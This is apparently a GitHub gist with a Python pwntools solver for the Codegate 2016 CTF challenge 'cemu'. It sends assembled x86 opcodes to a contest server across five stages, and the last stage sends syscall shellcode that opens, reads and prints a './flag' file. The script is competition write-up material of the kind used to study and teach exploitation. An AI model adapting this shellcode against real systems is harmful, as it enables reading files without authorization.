Created
March 17, 2016 01:01
-
-
Save vitapluvia/8901c95523f23a492168 to your computer and use it in GitHub Desktop.
Codegate 2016 CTF Quals - cemu (512)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import commands | |
| from pwn import * | |
| HOST = "175.119.158.136" | |
| # HOST = "175.119.158.132" | |
| PORT = 31337 | |
| c = remote(HOST, PORT) | |
| def getIdent(t): | |
| if t == '+' or t == '-': | |
| return '0' | |
| else: | |
| return '1' | |
| def getPayloadExpr(instr, val): | |
| cmd = "rasm2 -a x86 'mov {}, {}'".format(instr, getIdent(val)) | |
| return commands.getoutput(cmd) | |
| def stage1(): | |
| PAYLOAD = "" | |
| REGISTERS = { } | |
| print c.recvuntil("EAX = ") | |
| REGISTERS["EAX"] = c.recvline().strip() | |
| print c.recvuntil("EBX = ") | |
| REGISTERS["EBX"] = c.recvline().strip() | |
| print c.recvuntil("ECX = ") | |
| REGISTERS["ECX"] = c.recvline().strip() | |
| print c.recvuntil("EDX = ") | |
| REGISTERS["EDX"] = c.recvline().strip() | |
| print c.recvuntil("ESP = ") | |
| REGISTERS["ESP"] = c.recvline().strip() | |
| print c.recvuntil("EBP = ") | |
| REGISTERS["EBP"] = c.recvline().strip() | |
| print c.recvuntil("ESI = ") | |
| REGISTERS["ESI"] = c.recvline().strip() | |
| print c.recvuntil("EDI = ") | |
| REGISTERS["EDI"] = c.recvline().strip() | |
| print REGISTERS | |
| for k, v in REGISTERS.iteritems(): | |
| CMD = "rasm2 -a x86 'mov {}, {}'".format(k, v) | |
| PAYLOAD += commands.getoutput(CMD) | |
| # Input: | |
| print c.recvuntil("Opcode") | |
| # Send Input: | |
| c.sendline(PAYLOAD) | |
| # Result: | |
| print c.recvuntil("EIP = ") | |
| print c.recvline() | |
| print c.recvline() | |
| def stage2(): | |
| print c.recvuntil("below") | |
| print c.recvline() | |
| EXPR = c.recvline().strip().split() | |
| print "Expression: {}".format(repr(EXPR)) | |
| PAYLOAD = "" | |
| EAX = "rasm2 -a x86 'mov {}, {}'".format("EAX", EXPR[-1]) | |
| PAYLOAD += commands.getoutput(EAX) | |
| # Samples: | |
| # eax - ebp - esp - edx + edi + ebx * esi - ecx = 1992741006 | |
| # eax * ebp * esp + edx * edi * ebx * esi - ecx = 4235741836 | |
| # eax + ebp * esp + edx * edi - ebx * esi * ecx = 3774945113 | |
| # eax + ebp * esp + edx - edi * ebx * esi + ecx = 3226531046 | |
| # Transform: | |
| # eax + ebp * esp + edx - edi * ebx * esi + ecx = 3226531046 | |
| # 3226531046 + 0 * 1 + 0 - 0 * 1 * 1 + 0 = 3226531046 | |
| PAYLOAD += getPayloadExpr(EXPR[2], EXPR[2 - 1]) | |
| PAYLOAD += getPayloadExpr(EXPR[4], EXPR[4 - 1]) | |
| PAYLOAD += getPayloadExpr(EXPR[8], EXPR[8 - 1]) | |
| PAYLOAD += getPayloadExpr(EXPR[10], EXPR[10 - 1]) | |
| PAYLOAD += getPayloadExpr(EXPR[12], EXPR[12 - 1]) | |
| PAYLOAD += getPayloadExpr(EXPR[14], EXPR[14 - 1]) | |
| c.sendline(PAYLOAD) | |
| print c.recvuntil("EIP = ") | |
| print c.recvline() | |
| print c.recvline() | |
| def stage3(): | |
| print c.recvuntil("Opcode") | |
| # rasm2 "mov edi, 0x1010; mov ecx, 0xffffffff" | xargs echo -n && echo -n f3ae && rasm2 "mov eax, edi" | |
| readMem = "bf10100000b9fffffffff3ae89f8" | |
| # Reads 32 bytes from memory | |
| print "Sending ReadMem: {}".format(readMem) | |
| c.sendline(readMem) | |
| print c.recvuntil("EIP =") | |
| print c.recvline() | |
| print c.recvline() | |
| print c.recvline() | |
| def stage4(): | |
| print c.recvuntil("yeah!") | |
| print c.recvline() | |
| eip_target = c.recvline() | |
| print eip_target | |
| eip_target = eip_target.split(" ")[-1].strip() | |
| print eip_target | |
| print "Current EIP Target: {}".format(eip_target) | |
| print c.recvuntil("code") | |
| # [ A: store target in eaxx ] [ B: set target to jump to self (eax) ] [ C: jmp to target ] | |
| cmd = "mov eax, {}; mov dword ptr[eax], 0xe0ff; jmp eax".format(eip_target) | |
| result = commands.getoutput("rasm2 '{}'".format(cmd)) | |
| print result | |
| c.sendline(result) | |
| print c.recvuntil("EIP = ") | |
| def stage5(): | |
| # ./flag = push 0x67616c66 | |
| openFile = """ | |
| xor eax, eax; | |
| push eax; | |
| push 0x67616c66; | |
| xor eax, eax; | |
| mov al, 5; | |
| mov ebx, esp; | |
| xor ecx, ecx; | |
| int 0x80;""" | |
| readFile = """ | |
| mov ebx, eax; | |
| xor eax, eax; | |
| mov al, 3; | |
| mov ecx, esp; | |
| xor edx, edx; | |
| mov dl, 64; | |
| int 0x80;""" | |
| writeOutput = """ | |
| mov edx, eax; | |
| xor eax, eax; | |
| xor ebx, ebx; | |
| mov al, 4; | |
| mov bl, 1; | |
| mov ecx, esp; | |
| int 0x80;""" | |
| openFileExec = commands.getoutput("rasm2 '{}'".format(openFile)) | |
| readFileExec = commands.getoutput("rasm2 '{}'".format(readFile)) | |
| writeOutputExec = commands.getoutput("rasm2 '{}'".format(writeOutput)) | |
| opcodes = openFileExec + readFileExec + writeOutputExec | |
| print c.recvuntil("code") | |
| c.sendline(opcodes) | |
| print c.recvuntil("Stage5 Clear!") | |
| def main(): | |
| stage1() | |
| stage2() | |
| stage3() | |
| stage4() | |
| stage5() | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment